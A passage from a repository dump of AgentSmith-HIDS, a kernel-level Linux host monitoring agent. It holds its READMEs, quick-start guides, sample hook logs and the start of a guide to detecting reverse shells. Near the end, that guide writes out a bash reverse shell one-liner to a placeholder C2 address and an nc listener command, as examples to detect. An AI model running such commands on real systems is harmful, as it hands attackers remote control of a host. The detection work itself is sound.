---------------------- | ----------------- |\n|22.329|14.885|\n\nUninstall Smith：\n\n| Average User Time(s) |  Average System Time(s) |\n| ---------------------- | ----------------- |\n|22.271|14.395|\n\n### 部署及测试文档\n\n[Quick Start](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start-zh_CN.md)\n\n\n\n\n### 
Acknowledgements (in no particular order)\n\n[yuzunzhi](https://github.com/yuzunzhi)\n\n[hapood](https://github.com/hapood)\n\n[HF-Daniel](https://github.com/HF-Daniel)\n\n[smcdef](https://github.com/smcdef)\n\n\n### Author's WeChat\n\n**If you run into any problem while using it, please open an ISSUE; for other discussion you can reach me on WeChat**\n\n<img src=\"doc/wechat.jpg\" width=\"50%\" height=\"50%\"/>\n\n\n\n\n### WeChat public account of 灾难控制局\n\nUpdates and detailed write-ups of AgentSmith-HIDS capabilities are posted there from time to time; follow it if you are interested:\n\n<img src=\"doc/SecDamageControl.jpg\" width=\"50%\" height=\"50%\"/>\n\n\n## License\n\nThe AgentSmith-HIDS kernel module is distributed under the GNU GPLv2 license.\n"
  },
  {
    "path": "README.md",
    "content": "# AgentSmith-HIDS\n\n&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;--The name of this project was inspired by the movie - The Matrix\n\n[![License](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://github.com/DianrongSecurity/AgentSmith-HIDS/blob/master/LICENSE) [![Project Status: Active – The project has reached a stable, usable state and is being actively developed.](https://www.repostatus.org/badges/latest/active.svg)](https://www.repostatus.org/#active)\n\nEnglish | [简体中文](README-zh_CN.md)\n\n\n\n# THIS REPO IS OLD\n# RELEASE VERSION: https://github.com/bytedance/Elkeid\n\n\n### About AgentSmith-HIDS\n\nTechnically, AgentSmith-HIDS is not a Host-based Intrusion Detection System (HIDS), since it lacks a rule engine and detection functions. However, it can be used as a high-performance 'Host Information Collection Agent' as part of your own HIDS solution.\nThe comprehensiveness of the information this agent can collect was one of the most important metrics while developing the project, so it was built to work in the kernel, which gives it a large advantage over tools that work in user space, such as:\n\n* **Better performance**: the information needed is collected in the kernel, which avoids supplementary actions such as traversing '/proc'; to speed up data transport, collected data is transferred via shared memory instead of netlink.\n* **Hard to bypass**: information collection is powered by a purpose-built kernel driver, which makes it almost impossible for malicious software such as rootkits, which deliberately hide themselves, to evade detection.\n* **Easy to integrate**: AgentSmith-HIDS was built to integrate with other applications and can be used not only as a security tool but also as a monitoring tool, or even as a good detector of your assets. 
The agent collects users, files, processes and network connections for you, so imagine integrating it with a CMDB: you could get a comprehensive map of your network, hosts, containers and business applications (even their dependencies). What if you also have a database audit tool at hand? The map can be extended to cover the relationships between your DBs, DB users, tables, fields, applications, network, hosts, containers and so on. Integration with a network intrusion detection system and/or threat intelligence could raise traceability further still. It just never gets old.\n* **Kernel stack + User stack**: AgentSmith-HIDS also provides a user-space module that further extends the functionality of the kernel module.\n\n\n\n### Major abilities of AgentSmith-HIDS:\n\n* The kernel module hooks **execve, connect, process inject, create file, DNS query, load LKM** behaviors via Kprobe, and can also monitor containers because it is aware of Linux namespaces.\n* The user-space module provides built-in detection functions, including queries of the **User List**, **Listening ports list**, **System RPM list** and **Scheduled jobs**\n* **AntiRootkit**, from [Tyton](https://github.com/nbulischeck/tyton); for now the **PROC_FILE_HOOK**, **SYSCALL_HOOK**, **LKM_HIDDEN** and **INTERRUPTS_HOOK** features are included, but they only work on Kernel > 3.10.\n* Cred Change monitoring (sudo/su/sshd excluded)\n* User Login monitoring\n\n\n### Usage scenarios/methods of AgentSmith-HIDS (to be added)\n\n* [How to detect reverse shell by AgentSmith HIDS](doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/How-to-detect-reverse-shell-by-AgentSmith-HIDS.md)\n\n\n### About the compatibility with Kernel version\n\n* Kernel > 2.6.25\n* AntiRootKit > 3.10\n\n\n### About the compatibility with Containers\n\n| Source | Nodename       |\n| ------ | -------------- |\n| Host   | hostname       |\n| Docker | container name |\n| k8s    | pod name       
|\n\n\n\n\n### Composition of AgentSmith-HIDS\n\n* **Kernel stack module (LKM)**\n    Hooks key kernel functions via Kprobe to capture the information needed.\n* **User stack module** \n    Collects the data captured by the kernel module, performs the necessary processing and sends it to Kafka; \n    keeps sending heartbeat packets to the server so that process integrity can be verified; \n    executes commands received from the server.\n* **Agent Server**(Optional)\n    Sends commands to the user stack module and monitors its status.\n\n### Execve Hook\n\nAchieved by hooking **sys_execve()/sys_execveat()/compat_sys_execve()/compat_sys_execveat()**, example:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/tmp\",\n    \"exe\":\"/opt/ltp/testcases/bin/growfiles\",\n    \"argv\":\"growfiles -W gf26 -D 0 -b -i 0 -L 60 -u -B 1000b -e 1 -r 128-32768:128 -R 512-64000 -T 4 -f gfsmallio-35861 -d /tmp/ltp-Ujxl8kKsKY \",\n    \"pid\":\"35861\",\n    \"ppid\":\"35711\",\n    \"pgid\":\"35861\",\n    \"tgid\":\"35861\",\n    \"comm\":\"growfiles\",\n    \"nodename\":\"test\",\n    \"stdin\":\"/dev/pts/1\",\n    \"stdout\":\"/dev/pts/1\",\n    \"sessionid\":\"3\",\n    \"sip\":\"192.168.165.1\",\n    \"sport\":\"61726\",\n    \"dip\":\"192.168.165.128\",\n    \"dport\":\"22\",\n    \"sa_family\":\"1\",\n    \"pid_tree\":\"1(systemd)->1384(sshd)->2175(sshd)->2177(bash)->2193(fish)->35552(runltp)->35711(ltp-pan)->35861(growfiles)\",\n    \"tty_name\":\"pts1\",\n    \"socket_process_pid\":\"2175\",\n    \"socket_process_exe\":\"/usr/sbin/sshd\",\n    \"SSH_CONNECTION\":\"192.168.165.1 61726 192.168.165.128 22\",\n    \"LD_PRELOAD\":\"/root/ldpreload/test.so\",\n    \"user\":\"root\",\n    \"time\":\"1579575429143\",\n    \"local_ip\":\"192.168.165.128\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"01272152d4901fd3c2efacab5c0e38e5\",\n    \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\n### Bind Hook\n\nAchieved by hooking **sys_bind()**, 
example:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"49\",\n    \"sa_family\":\"2\",\n    \"exe\":\"/usr/bin/python2.7\",\n    \"pid\":\"109640\",\n    \"ppid\":\"215496\",\n    \"pgid\":\"109640\",\n    \"tgid\":\"109640\",\n    \"comm\":\"python\",\n    \"nodename\":\"n225-117-018\",\n    \"sip\":\"0.0.0.0\",\n    \"sport\":\"8000\",\n    \"res\":\"0\",\n    \"sessionid\":\"30\",\n    \"user\":\"root\",\n    \"time\":\"1587540231936\",\n    \"local_ip_str\":\"10.225.117.18\",\n    \"hostname_str\":\"n225-117-018\",\n    \"exe_md5\":\"4f458165a2129ba549f1b6605ee87e74\"\n}\n```\n\n### Connect Hook\n\nAchieved by hooking **tcp_v4_connect()/tcp_v6_connect()/ip4_datagram_connect()/ip6_datagram_connect()**, example:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"42\",\n    \"sa_family\":\"2\",\n    \"connect_type\":\"4\",\n    \"dport\":\"1025\",\n    \"dip\":\"180.101.49.11\",\n    \"exe\":\"/usr/bin/ping\",\n    \"pid\":\"6294\",\n    \"ppid\":\"1941\",\n    \"pgid\":\"6294\",\n    \"tgid\":\"6294\",\n    \"comm\":\"ping\",\n    \"nodename\":\"test\",\n    \"sip\":\"192.168.165.153\",\n    \"sport\":\"45524\",\n    \"res\":\"0\",\n    \"sessionid\":\"1\",\n    \"user\":\"root\",\n    \"time\":\"1575721921240\",\n    \"local_ip\":\"192.168.165.153\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"735ae70b4ceb8707acc40bc5a3d06e04\"\n}\n```\n\n\n\n### DNS Query Hook\n\nAchieved by hooking **udp_recvmsg()/udpv6_recvmsg()**, example:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"601\",\n    \"sa_family\":\"2\",\n    \"dport\":\"53\",\n    \"dip\":\"192.168.165.2\",\n    \"exe\":\"/usr/bin/ping\",\n    \"pid\":\"6294\",\n    \"ppid\":\"1941\",\n    \"pgid\":\"6294\",\n    \"tgid\":\"6294\",\n    \"comm\":\"ping\",\n    \"nodename\":\"test\",\n    \"sip\":\"192.168.165.153\",\n    \"sport\":\"53178\",\n    \"qr\":\"1\",\n    \"opcode\":\"0\",\n    \"rcode\":\"0\",\n    \"query\":\"www.baidu.com\",\n    \"sessionid\":\"1\",\n    
\"user\":\"root\",\n    \"time\":\"1575721921240\",\n    \"local_ip\":\"192.168.165.153\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"39c45487a85e26ce5755a893f7e88293\"\n}\n```\n\n\n\n### Create File Hook\n\nAchieved by hooking **security_inode_create()**, example:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"602\",\n    \"exe\":\"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.232.b09-0.el7_7.x86_64/jre/bin/java\",\n    \"file_path\":\"/tmp/kafka-logs/replication-offset-checkpoint.tmp\",\n    \"pid\":\"3341\",\n    \"ppid\":\"1\",\n    \"pgid\":\"2657\",\n    \"tgid\":\"2659\",\n    \"comm\":\"kafka-scheduler\",\n    \"nodename\":\"test\",\n    \"sessionid\":\"3\",\n    \"user\":\"root\",\n    \"time\":\"1575721984257\",\n    \"local_ip\":\"192.168.165.153\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"215be70a38c3a2e14e09d637c85d5311\",\n    \"create_file_md5\":\"d41d8cd98f00b204e9800998ecf8427e\"\n}\n```\n\n\n\n### Process Inject Hook\n\nAchieved by hooking **sys_ptrace()**, example:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"101\",\n    \"ptrace_request\":\"4\",\n    \"target_pid\":\"7402\",\n    \"addr\":\"00007ffe13011ee6\",\n    \"data\":\"-a\",\n    \"exe\":\"/root/ptrace/ptrace\",\n    \"pid\":\"7401\",\n    \"ppid\":\"1941\",\n    \"pgid\":\"7401\",\n    \"tgid\":\"7401\",\n    \"comm\":\"ptrace\",\n    \"nodename\":\"test\",\n    \"sessionid\":\"1\",\n    \"user\":\"root\",\n    \"time\":\"1575722717065\",\n    \"local_ip\":\"192.168.165.153\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"863293f9fcf1af7afe5797a4b6b7aa0a\"\n}\n```\n\n\n### Load LKM File Hook\n\nAchieved by hooking **load_module()**, example:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"603\",\n    \"exe\":\"/usr/bin/kmod\",\n    \"lkm_file\":\"/root/ptrace/ptrace\",\n    \"pid\":\"29461\",\n    \"ppid\":\"9766\",\n    \"pgid\":\"29461\",\n    \"tgid\":\"29461\",\n    \"comm\":\"insmod\",\n    \"nodename\":\"test\",\n    \"sessionid\":\"13\",\n    
\"user\":\"root\",\n    \"time\":\"1577212873791\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"0010433ab9105d666b044779f36d6d1e\",\n    \"load_file_md5\":\"863293f9fcf1af7afe5797a4b6b7aa0a\"\n}\n```\n\n\n### Cred Change Hook\n\nAchieved by hooking **commit_creds()**, example:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"604\",\n    \"exe\":\"/tmp/tt\",\n    \"pid\":\"27737\",\n    \"ppid\":\"26865\",\n    \"pgid\":\"27737\",\n    \"tgid\":\"27737\",\n    \"comm\":\"tt\",\n    \"old_uid\":\"1000\",\n    \"nodename\":\"test\",\n    \"sessionid\":\"42\",\n    \"user\":\"root\",\n    \"time\":\"1578396197131\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"d99a695d2dc4b5099383f30964689c55\"\n}\n```\n\n\n### User Login Alert\n```json\n{\n    \"data_type\":\"1001\",\n    \"status\":\"Failed\",\n    \"type\":\"password\",\n    \"user_exsit\":\"false\",\n    \"user\":\"sad\",\n    \"from_ip\":\"192.168.165.1\",\n    \"port\":\"63089\",\n    \"processor\":\"ssh2\",\n    \"time\":\"1578405483119\",\n    \"local_ip\":\"192.168.165.128\",\n    \"hostname\":\"localhost.localdomain\"\n}\n```\n\n\n### PROC File Hook Alert\n```json\n{\n    \"uid\":\"-1\",\n    \"data_type\":\"700\",\n    \"module_name\":\"autoipv6\",\n    \"hidden\":\"0\",\n    \"time\":\"1578384987766\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\"\n}\n```\n\n\n### Syscall Hook Alert\n```json\n{\n    \"uid\":\"-1\",\n    \"data_type\":\"701\",\n    \"module_name\":\"diamorphine\",\n    \"hidden\":\"1\",\n    \"syscall_number\":\"78\",\n    \"time\":\"1578384927606\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\"\n}\n```\n\n\n### LKM Hidden Alert\n```json\n{\n    \"uid\":\"-1\",\n    \"data_type\":\"702\",\n    \"module_name\":\"diamorphine\",\n    \"hidden\":\"1\",\n    \"time\":\"1578384927606\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\"\n}\n```\n\n\n### 
Interrupts Hook Alert\n```json\n{\n    \"uid\":\"-1\",\n    \"data_type\":\"703\",\n    \"module_name\":\"syshook\",\n    \"hidden\":\"1\",\n    \"interrupt_number\":\"2\",\n    \"time\":\"1578384927606\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\"\n}\n```\n\n\n### About Performance of AgentSmith-HIDS\n\nTesting Environment (VM):\n\n| CPU       |  Intel(R) Xeon(R) Platinum 8260 CPU @ 2.40GHz    4 cores |\n| --------- | ------------------------------------------------ |\n| RAM       | 8GB                                              |\n| OS/Kernel | Debian9  /  4.14.81.bm.19-amd64          |\n\nTesting Load:\n\n`ltp -f syscalls`\n\nTesting Result (1 min):\n\n| Hook Handler           | Average Delay(us) |  TP99(us) |   TP95(us) |   TP90(us) |\n| ---------------------- | ----------------- | ----|----|----|\n|   connect_entry_handler| 0.2914          |6.7627|0.355|0.3012|\n|   connect_handler      |   2.1406        |18.3801|12.102|7.832|\n|   execve_entry_handler |   5.9320        |13.7034|9.908|8.334|\n|   execve_handler       |   6.8826        |26.0584|15.9976|12.6260|\n|   security_inode_create_entry_handler|   1.9963|9.3042|6.7730|4.6816|\n|   security_inode_create_handler|   4.2114|13.2165|8.83775|6.534|\n\nRaw Testing Data:\n\n[Benchmark Data](https://github.com/EBWi11/AgentSmith-HIDS/tree/master/benchmark_data)\n\n\n**cyclictest testing**\n\n`cyclictest -p 90 -m -c 0 -i 200 -n -h 100 -q -l 1000000`\n\nSmith uninstalled:\n```\n# Total: 000999485\n# Min Latencies: 00002\n# Avg Latencies: 00007\n# Max Latencies: 13905\n# Histogram Overflows: 00515\n```\n\nSmith installed:\n```\n# Total: 000999519\n# Min Latencies: 00002\n# Avg Latencies: 00007\n# Max Latencies: 15216\n# Histogram Overflows: 00481\n```\n\n\n**time -v /opt/ltp/testcases/bin/execve05 -n 30000**\n\n10 runs\n\nSmith installed:\n\n| Average User Time(s) |  Average System Time(s) |\n| ---------------------- | ----------------- |\n|22.329|14.885|\n\nSmith uninstalled:\n\n| Average User 
Time(s) |  Average System Time(s) |\n| ---------------------- | ----------------- |\n|22.271|14.395|\n\n### Documents for deployment and testing\n\n[Quick Start](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md)\n\n\n\n\n### Special Thanks (in no particular order)\n\n[yuzunzhi](https://github.com/yuzunzhi)\n\n[hapood](https://github.com/hapood)\n\n[HF-Daniel](https://github.com/HF-Daniel)\n\n[smcdef](https://github.com/smcdef)\n\n\n### WeChat of the developer\n\n<img src=\"doc/wechat.jpg\" width=\"50%\" height=\"50%\"/>\n\n\n### WeChat channel of '灾难控制局'\n\nWe regularly post information about the functionality of AgentSmith-HIDS on this channel; it is a good place to get the latest news:)\n\n<img src=\"doc/SecDamageControl.jpg\" width=\"50%\" height=\"50%\"/>\n\n\n## License\n\nThe AgentSmith-HIDS kernel module is distributed under the GNU GPLv2 license.\n"
  },
  {
    "path": "doc/AgentSmith-HIDS ToDo List.md",
    "content": "### AgentSmith-HIDS ToDo List\n\n* Go through ATT&CK and map techniques one by one\n* Automated stability testing / automated builds for all kernel versions\n* Privilege escalation detection\n* Better K8S compatibility\n* Rootkit/Bootkit\n* Rule engine\n* Better adaptation to different distributions\n* Some necessary User Space Hooks\n* Collection of scheduled tasks / startup items\n* Collection of package/library versions\n* Add STDOUT to the Agent\n"
  },
  {
    "path": "doc/AgentSmith-HIDS-Quick-Start-zh_CN.md",
    "content": "# AgentSmith-HIDS Quick Start\n\n[English](AgentSmith-HIDS-Quick-Start.md) | 简体中文\n\n\n### 1.AgentSmith-HIDS Simple Flow Chart\n\n![simple_flow_chart](simple_flow_chart.png)\n\n\n\n### 2.Get Clone Project\n\n`git clone https://github.com/EBWi11/AgentSmith-HIDS.git`\n\n\n\n### 3.Compile the kernel driver module\n\n* Install `kernel-devel` && `kernel-header` via `yum`, `apt` or another method\n* Run `make` in the `driver/LKM` directory to get 'smith.ko'\n* Run `insmod smith.ko`\n* Run `lsmod | grep smith` to verify that the smith driver was installed successfully\n* Deploy the compiled LKM file to the test server; note that its kernel version must match the build server.\n\n![quick-start-01](quick-start-01.png)\n\n\n\n### 4.Test 'smith.ko'\n\n* Install `gcc` via `yum`, `apt` or another method\n* In the `driver/test` directory run `gcc -o test shm_user.c` to get the 'test' program\n* Run `./test` to verify that the AgentSmith-HIDS core module is working properly\n\n![quick-start-02](quick-start-02.png)\n\n\n\n### 5.Deploy the Kafka environment && Agent Server environment (optional)\n\n* Deploy a Kafka Server as the receiving end of the test environment; note that the topic must be created manually:\n  Create the topic: `./kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic hids`\n\n* (Optional) Deploy the HIDS heartbeat Server for the test environment; see [smith_console](https://github.com/EBWi11/AgentSmith-HIDS/tree/master/smith_console) for details\n\n\n\n### 6.Compile the user-space module\n\n* Requires a Rust-lang environment: https://www.rust-lang.org/tools/install\n\n* In the `agent/src/conf` directory, first edit the agent configuration file `agent/src/conf/settings.rs` to set the Kafka and heartbeat configuration, then run `cargo build --release`; the compiled agent is placed in `agent/target/release/`. (Note: `install openssl` && `install openssl-devel` beforehand)\n\n* Install the agent: deploy the agent to the test environment and run it directly\n\nNote: since the Agent obtains the local IP via the command `hostname -i`, make sure the hostname and hosts are configured correctly during testing, otherwise the HIDS Console cannot read the correct IP.\n\n\n![quick-start-03](quick-start-03.png)\n\n\n\n### 7.Custom detection module\n\n1. The custom detection module depends on the heartbeat detection module, i.e. heartbeat detection must be enabled before custom detection modules are supported;\n2. A custom detection module is triggered by the heartbeat Server issuing a command to the Agent, and the detection result is passed to the Server via Kafka, so it is not real-time;\n3. Custom detection functions are added in [detection_module.rs](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/agent/src/lib/detection_module.rs), and the mapping (between the command issued by the Server and the detection function to call) must be defined in the start function of the Detective impl in that file;\n4. 
After adding a custom detection function, the command-issuing logic must be added in [heartbeat_server.py](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/smith_console/heartbeat_server.py); note that commands must be separated from each other by \";\";\n5. The logic works as follows: the Agent sends a heartbeat packet to the heartbeat server, the Server returns a detection command, the Agent uses the command-to-function mapping to execute the detection function the command refers to, and the detection result is passed to the Server via Kafka.\n\n\n\n### 8.Uninstall\n* Before uninstalling AgentSmith-HIDS, stop the user-space agent process first. The agent's default log path is `/var/log/smith_hids.log` and its default pid file is `/var/run/smith_hids.pid`; by default run `cat /var/run/smith_hids.pid |xargs kill -9`, then complete the uninstall with `rmmod smith`.\n\n\n\n### 9.Smith LKM Definition\n\n| Define           | Description                                                  |\n| ---------------- | ------------------------------------------------------------ |\n| EXECVE_HOOK      | execve() Hook Switch:<br />1. Enable;<br />Default:1         |\n| CONNECT_HOOK     | connect() Hook Switch:<br />1. Enable;<br />Default:1        |\n| BIND_HOOK         | Bind Hook Switch:<br />1. Enable;<br />Default:1              |\n| DNS_HOOK         | DNS Hook Switch:<br />1. Enable;<br />Default:1              |\n| PTRACE_HOOK      | Process Injection Detect Hook Switch:<br />1. Enable;<br />Default:1 |\n| CREATE_FILE_HOOK | Create File Detect Hook Switch:<br />1. Enable;<br />Default:1 |\n| LOAD_MODULE_HOOK | init_module() Hook Switch:<br />1. Enable;<br />Default:1    |\n| EXIT_PROTECT     | Protect the agent itself from being rmmod:<br />1.Enable;<br />Default: 0 |\n| ROOTKIT_CHECK    | Regularly detect rootkit behavior. The default is 15 seconds:<br />1.Enable;<br />Default: 1 |\n| UPDATE_CRED_HOOK | Detect abnormal process Cred changes in real time:<br />1.Enable;<br />Default: 1 |\n\n\n\n### 10.Simple Demo\n\n![Demo](demo.gif)\n\n"
  },
  {
    "path": "doc/AgentSmith-HIDS-Quick-Start.md",
    "content": "# AgentSmith-HIDS Quick Start\n\nEnglish | [简体中文](AgentSmith-HIDS-Quick-Start-zh_CN.md)\n\n\n### 1.AgentSmith-HIDS Work Flow Chart\n\n![simple_flow_chart](simple_flow_chart.png)\n\n\n\n### 2.Get Clone Project\n\n`git clone https://github.com/EBWi11/AgentSmith-HIDS.git`\n\n\n\n### 3.Compile LKM, Get 'smith.ko' File\n\n* Install `kernel-devel` && `kernel-header` with `yum`, `apt` or another package tool\n* Go to the directory `driver/LKM` and execute `make`; you get the 'smith.ko' file\n* Execute `insmod smith.ko`\n* Execute `lsmod | grep smith` to verify that the LKM loaded successfully\n* Publish the compiled LKM file (smith.ko) to your test server. Please note that its kernel version needs to be consistent with the server used for compiling\n\n![quick-start-01](quick-start-01.png)\n\n\n\n### 4.Test 'smith.ko'\n\n* Install `gcc` with `yum`, `apt` or another package tool\n* Go to the directory `driver/test` and execute `gcc -o test shm_user.c`; you get 'test'\n* Execute `./test` to verify that the core module works\n\n![quick-start-02](quick-start-02.png)\n\n\n\n### 5.Deploy the Kafka Server && Agent Server (Optional)\n\n* Deploy a Kafka server in your test environment for receiving information and create the topic manually,\n  like this: `./kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic hids`\n\n* (Optional) Deploy a heartbeat server in your test environment; please refer to [smith_console](https://github.com/EBWi11/AgentSmith-HIDS/tree/master/smith_console)\n\n\n\n### 6.Compile User Space Module\n\n* Requires a Rust environment: https://www.rust-lang.org/tools/install\n\n* Go to the directory `agent/src/conf` and modify the Kafka information and heartbeat configuration in the agent's configuration file `agent/src/conf/settings.rs`, then run `cargo build --release`; the agent can be found in `agent/target/release/`. (You may need to `install openssl` && `install openssl-devel` first)\n\n* Install the agent: deploy the agent to your test environment and execute it directly\n\nNote: 
Since the Agent obtains the local IP through the command `hostname -i`, please ensure that the hostname and hosts are configured correctly during the test, so that the HIDS Console does not get a wrong one.\n\n![quick-start-03](quick-start-03.png)\n\n\n\n### 7.Custom detection module\n\n1. The custom detection module relies on the heartbeat detection module: you need to enable heartbeat detection to support the custom detection module;\n2. A custom detection module is triggered by the heartbeat server sending an instruction to the agent, and the detection result is transmitted to the server through Kafka, so it is not real-time;\n3. Custom detection functions are added in the [detection_module.rs](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/agent/src/lib/detection_module.rs) file, and the mapping relationship (between the instruction issued by the server and the detection function called) needs to be defined in the start function of the Detective impl in this file;\n4. After adding the custom detection function, you need to add the instruction-issuing logic in [heartbeat_server.py](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/smith_console/heartbeat_server.py). Note that instructions need to be separated from each other by \";\";\n5. Implementation logic: the agent sends a heartbeat packet to the heartbeat server, the server returns the detection instruction, the agent executes the detection function indicated by the instruction through the mapping of instructions to detection functions, and the detection result is transmitted to the server through Kafka.\n\n\n\n### 8.Uninstall\n* Before uninstalling AgentSmith-HIDS, you need to stop the user-mode agent process. The default log path of the agent is `/var/log/smith_hids.log`, and the default pid file is `/var/run/smith_hids.pid`. 
By default: `cat /var/run/smith_hids.pid |xargs kill -9`, then uninstall it with `rmmod smith`\n\n\n\n\n### 9.Smith LKM Definition\n\n| Define           | Description                                                  |\n| ---------------- | ------------------------------------------------------------ |\n| EXECVE_HOOK      | execve() Hook Switch:<br />1. Enable;<br />Default:1         |\n| CONNECT_HOOK     | connect() Hook Switch:<br />1. Enable;<br />Default:1        |\n| BIND_HOOK         | Bind Hook Switch:<br />1. Enable;<br />Default:1              |\n| DNS_HOOK         | DNS Hook Switch:<br />1. Enable;<br />Default:1              |\n| PTRACE_HOOK      | Process Injection Detect Hook Switch:<br />1. Enable;<br />Default:1 |\n| CREATE_FILE_HOOK | Create File Detect Hook Switch:<br />1. Enable;<br />Default:1 |\n| LOAD_MODULE_HOOK | init_module() Hook Switch:<br />1. Enable;<br />Default:1    |\n| EXIT_PROTECT     | Protect the agent itself from being rmmod:<br />1.Enable;<br />Default: 0 |\n| ROOTKIT_CHECK    | Regularly detect rootkit behavior. The default is 15 seconds:<br />1.Enable;<br />Default: 1 |\n| UPDATE_CRED_HOOK | Detect abnormal process Cred changes in real time:<br />1.Enable;<br />Default: 1 |\n\n### 10.Simple Demo\n\n![Demo](demo.gif)\n\n"
  },
  {
    "path": "doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/How-to-detect-reverse-shell-by-AgentSmith-HIDS.md",
    "content": "# How to detect reverse shell by AgentSmith-HIDS\n\nA reverse shell is a long-established post-intrusion behavior, used by attackers of every kind, from script kiddies to APT groups. Detection capability for it is therefore something any HIDS has to consider. However, there are plenty of highly flexible ways to set up a reverse shell, while there are currently few common detection methods that provide both a low false positive rate and a low false negative rate. AgentSmith-HIDS, as a product designed specifically for intrusion detection, will give you a different way of thinking about and approaching it.\n\n\n#### 1.What is a reverse shell\n\nWhen attackers gain access to a server, usually they cannot connect to the host through a forward channel such as SSH, because no public IP is bound to it or the connection is blocked by a firewall. So they need the compromised server itself to actively establish a connection to their remote side, through which further commands can be passed to the host; that is called a **reverse shell**.\n\n![1](1.png)\n\n\n\n#### 2.Execve Hook Information of AgentSmith-HIDS\n\nSince the main idea of this article is to explain how we can use **AgentSmith-HIDS** to detect reverse shells, and we will mostly use the Execve Hook information to do so, it is helpful to look into the Execve Hook information carefully first.\n\nLet's look at an example:\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls --color=auto --indicator-style=classify \",\n    \"pid\":\"6766\",\n    \"ppid\":\"2202\",\n    \"pgid\":\"6766\",\n    \"tgid\":\"6766\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"/dev/pts/2\",\n    \"stdout\":\"/dev/pts/2\",\n    \"sessionid\":\"5\",\n    \"dip\":\"192.168.165.1\",\n    \"dport\":\"50431\",\n    \"sip\":\"192.168.165.152\",\n    \"sport\":\"22\",\n    \"sa_family\":\"1\",\n    
\"pid_tree\":\"1(systemd)->1565(sshd)->2129(sshd)->2132(bash)->2202(fish)->6766(ls)\",\n    \"tty_name\":\"pts2\",\n    \"socket_process_pid\":\"2129\",\n    \"socket_process_exe\":\"/usr/sbin/sshd\",\n    \"SSH_CONNECTION\":\"192.168.165.1 50431 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580104906853\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\nPart of the field information and source (other basic information will not be repeated):\n\n| Field                                 | Remark                                                           |\n| ------------------------------------- | -----------------------------------------------------------------|\n| nodename                              | Node name of Linux namespace, hostname or container name         |\n| stdin/stdout                          | Process standard input / standard output information             |\n| sessionid                             | Process session id                                               |\n| pid_tree                              | Process tree                                                     |\n| dip/dport/sip/sport                   | **4-tuple of the first socket of the process tree where this process is under (looking in ascending order and limited to AF_INET or AF_INET6)** |\n| socket_process_pid/socket_process_exe | The pid and exe information of the first valid socket process    |\n| tty_name                              | Process tty information                                          |\n| SSH_CONNECTION                        | Extracted from environment variables, SSH connection information |\n| LD_PRELOAD                            | Extracted from environment variables, LD_PRELOAD                 |\n\nAmong them, it may be a bit difficult to understand 
**dip/dport/sip/sport** . Let's look at the above example: from **exe** and **argv** it can be determined that the **ls** command was executed. At the same time, looking at **dip/dport/sip/sport** and **socket_process_pid / socket_process_exe**, we learn that this connection belongs to **sshd**, i.e. an **ssh** session. Since **ls** itself needs no network connection, AgentSmith-HIDS walks up the process tree and stops when it finds a process with a valid socket, or reaches the head of the tree if nothing is found. Obviously, the **ls** command was executed by someone who logged onto this host through an SSH session, so we find the connection information of that **ssh** session. This can be cross-checked against **SSH_CONNECTION** in the environment variables.\n\n![4](4.png)\n\nIt should be noted that this information can be interfered with. For performance reasons, we do not want to extract all socket information or traverse every 'fd' of each process, which is a potential limitation.\n\n\n\n#### 3. The simplest reverse shell\n\nThe simplest reverse shell is `bash -i`, like this:\n\n`bash -i >& /dev/tcp/c2_ip/c2_port 0>& 1`\n\nThe `-i` parameter indicates that an interactive shell is spawned, and then the TCP connection takes over the input and output of the shell, which gives a reverse shell. The controlling end on the remote side only needs to run this in advance:\n\n`nc -l port`\n\nThis listens on the specified port and waits for the shell to come knocking 